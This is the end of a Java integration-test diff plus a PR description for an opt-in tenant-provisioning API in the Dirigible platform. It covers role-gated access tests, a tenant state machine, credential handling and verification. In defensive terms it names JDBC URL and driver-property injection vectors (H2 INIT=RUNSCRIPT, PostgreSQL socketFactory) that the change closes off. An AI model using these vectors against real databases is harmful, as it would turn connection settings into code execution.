+                   .get(TENANTS_PATH + ROLLBACK_TENANT_ID)
+                   .then()
+                   .statusCode(404);
+        });
+        assertTrue(tenantService.findById(ROLLBACK_TENANT_ID)
+                                .isEmpty());
+    }
+
+    @Test
+    void anAuthenticatedUserWithoutARoleIsRefused() {
+        securityUtil.ensureUserInDefaultTenant(PLAIN_USER, PASSWORD);
+
+        restAssuredExecutor.execute(() -> given().contentType(ContentType.JSON)
+                                                 .body(Map.of("name", "Refused"))
+                                                 .when()
+                                                 .put(TENANTS_PATH + UNPROTECTED_TENANT_ID)
+                                                 .then()
+                                                 .statusCode(403),
+                PLAIN_USER, PASSWORD);
+    }
+
+    /**
+     * The role a machine-to-machine client actually presents - it holds nothing else, which is why the
+     * API needed a URL prefix outside the platform's own role-gated ones.
+     */
+    @Test
+    void aClientHoldingOnlyTheProvisionerRoleIsAdmitted() {
+        securityUtil.ensureRole(TENANT_PROVISIONER);
+        securityUtil.ensureUserInDefaultTenant(PROVISIONER_USER, PASSWORD, TENANT_PROVISIONER);
+
+        restAssuredExecutor.execute(() -> given().contentType(ContentType.JSON)
+                                                 .body(Map.of("name", "Admitted"))
+                                                 .when()
+                                                 .put(TENANTS_PATH + "provisioning-api-it-m2m")
+                                                 .then()
+                                                 .statusCode(201),
+                PROVISIONER_USER, PASSWORD);
+    }
+
+    private static io.restassured.response.Response register(String tenantId, String name) {
+        return given().contentType(ContentType.JSON)
+                      .body(Map.of("name", name))
+                      .when()
+                      .put(TENANTS_PATH + tenantId);
+    }
+
+    private static io.restassured.response.Response registerWithSubdomain(String tenantId, String name, String subdomain) {
+        return given().contentType(ContentType.JSON)
+                      .body(Map.of("name", name, "subdomain", subdomain))
+                      .when()
+                      .put(TENANTS_PATH + tenantId);
+    }
+}


### PR DESCRIPTION
Lets an external provisioner own a tenant end to end: register it under an id
it chose, hand the platform the database user and schema it created itself,
activate it, and watch its artefacts materialize. Off unless a deployment asks
for it.

Today a tenant can only be provisioned by the platform, which creates its
database user and schema itself. A landscape where one provisioning service
owns tenants across several applications needs the other direction, and the
two flows must not fight over the same tenant.

### The state machine

`TenantStatus.PENDING_ACTIVATION` is the window in which a tenant exists but
nothing has been done for it yet. It is invisible to both halves of the
built-in flow — `TenantsProvisioner` queries `INITIAL` only,
`executeForEachTenant` queries `PROVISIONED` only — so the platform never
creates a second user and schema beside the ones that already exist, and no
synchronizer touches a tenant whose data source is not registered. `DELETE`
accepts it: nothing has materialized, so a provisioner that fails before
activating has a rollback rather than a half-registered tenant.

### The API

```
PUT  /services/tenant-provisioning/tenants/{tenantId}
GET  /services/tenant-provisioning/tenants/{tenantId}
PUT  /services/tenant-provisioning/tenants/{tenantId}/datasources/default
POST /services/tenant-provisioning/tenants/{tenantId}/activation
GET  /services/tenant-provisioning/tenants/{tenantId}/activation
```

Every call is idempotent, because the caller is a retrying process: a full
re-run of the sequence converges rather than collides.

- **Registration** takes a caller-supplied id — one tenant is the same
  customer in every application of a landscape. The id is held to a DNS label,
  and so is the subdomain: the id is also the prefix of the data source name
  and the first segment of the identity provider group
  `<tenantId>.<appId>.<role>`, which a dot would make unparseable, while the
  subdomain is matched out of a request's host name and could never resolve as
  anything else. The tenant's artefact location carries the id, so its unique
  key does not depend on the display name — two customers may both be
  "Acme Ltd".
- **The data source** is a clone of the application's own with the supplied
  credentials in its place. Credentials, schema and nothing else: the URL, the
  driver and the connection properties always come from the application's own
  data source, because a caller-chosen JDBC URL or driver property is
  executable surface (H2 `INIT=RUNSCRIPT`, PostgreSQL `socketFactory`) and
  would turn this role into code execution. CodeQL flagged the first draft as
  a critical `java/ssrf`; the fields are removed rather than validated, since
  nothing needed them. Two details matter: the pool is always evicted
  (an initialized pool keeps the credentials it was built with, whatever its
  definition later says, and only removal closes it), and the credentials are
  tried through the platform's own initializer before they are stored — so
  what is proven is that the pool the application will use can connect, and a
  refused check stores nothing. The check issues **no SQL of its own**:
  building the pool already validates a connection with whatever mechanism
  that database needs (`HanaDatabaseConfigurator` registers
  `SELECT 1 FROM DUMMY`, for instance), and what remains is the JDBC-standard
  `Connection.isValid`. A hand-written `SELECT 1` would have refused valid
  credentials on HANA and Derby. Nor can that check be skipped: saving a
  definition initializes its pool through a lifecycle listener anyway, so an
  opt-out only replaced the 502 with an unhandled 500.
- **Activation** flips the tenant to `PROVISIONED` first and in the request
  thread (the per-tenant fan-out only visits provisioned tenants), marks the
  per-tenant definitions for reprocessing, and hands the pass to an executor.
  The marking is synchronous on purpose: the status is derived from exactly
  that state, so a caller polling the instant it is answered would otherwise
  read `COMPLETED` off state nothing had touched and skip the wait entirely.

### The status is derived, not tracked

From the checksums the activation blanked and what the synchronizers recorded
afterwards — durable rows every node shares. Same answer from any instance,
survives a restart, cannot disagree with reality the way a run registry can.
Failure is read from both places it can land: a definition that would not
parse, and an artefact that parsed but could not be materialized into the
tenant's schema. The second is the one that matters here — materializing with
externally created credentials is what this API drives — and watching
definitions alone would report such a run as a success.

### Isolation

Everything is conditional on `DIRIGIBLE_TENANT_PROVISIONING_API_ENABLED`
(default `false`), read from Dirigible's own configuration rather than through
`@ConditionalOnProperty`, since a programmatically set value never reaches the
Spring `Environment`. A deployment that did not opt in has no endpoint and no
bean from here at all — not an endpoint that refuses. It accepts database
credentials over HTTP, so that distinction is the isolation.

The URL prefix is deliberately outside `/services/data/` and
`/services/security/`: those gate on the platform's human roles and would
reject a machine token holding only `TENANT_PROVISIONER`. That role is a
string constant and **not** a `Roles` enum value — trial mode grants every
enum role to everyone.

Shared-code footprint: one enum value, one `BaseEndpoint` constant, one
relaxed `DELETE` condition, one `Optional` finder on `DataSourceService`, and
the multitenant-synchronizer set extracted into a bean two features now share
instead of deriving twice.

### Verification

- **77 unit tests** — 69 in the new component (the full status-derivation
  matrix, the id and subdomain alphabets, the upsert and its pool eviction,
  the activation preconditions and coalescing) and 8 in `core-tenants`,
  pinning both sides of the `PENDING_ACTIVATION` invariant, neither of which
  had a unit test before.
- **21 integration tests** — the whole external sequence run twice against a
  pre-created schema and user, asserting a table physically present in that
  schema; the built-in provisioner leaving an externally owned tenant alone
  while it demonstrably provisions an `INITIAL` one in the same run; a hostile
  JDBC URL in the body being ignored; two tenants sharing a display name; the
  refusals with their reasons; and the API being absent when the flag is off.
- **Driven by hand against PostgreSQL 16** — several tenants, a rollback, and
  the negative paths — because the integration suite runs on H2, where "a
  database user somebody else created" is a fiction: the same JVM owns the
  file. That is where three of the commits here come from, none of which the
  H2 tests caught:
  - every refusal arrived with no reason in it, because
    `server.error.include-message=always` does not reach a
    `ResponseStatusException` raised from a controller. Not specific to this
    component — filed as #6994, 213 throw sites across 51 files, with two
    earlier local workarounds (#6461/#6468 in engine-java). The advice added
    here is deliberately scoped to this component and should be retired when
    #6994 is fixed centrally;
  - a caller-supplied JDBC URL reached the driver (the critical `java/ssrf`);
  - registering a second tenant under a display name another tenant already
    had answered 500, because the artefact key was `type:location:name` with a
    constant location. Its regression test was checked against the unfixed
    code and reproduces the 500.

Manual end-to-end testing is complete and passing.

🤖 Generated with [Claude Code](https://claude.com/claude-code)



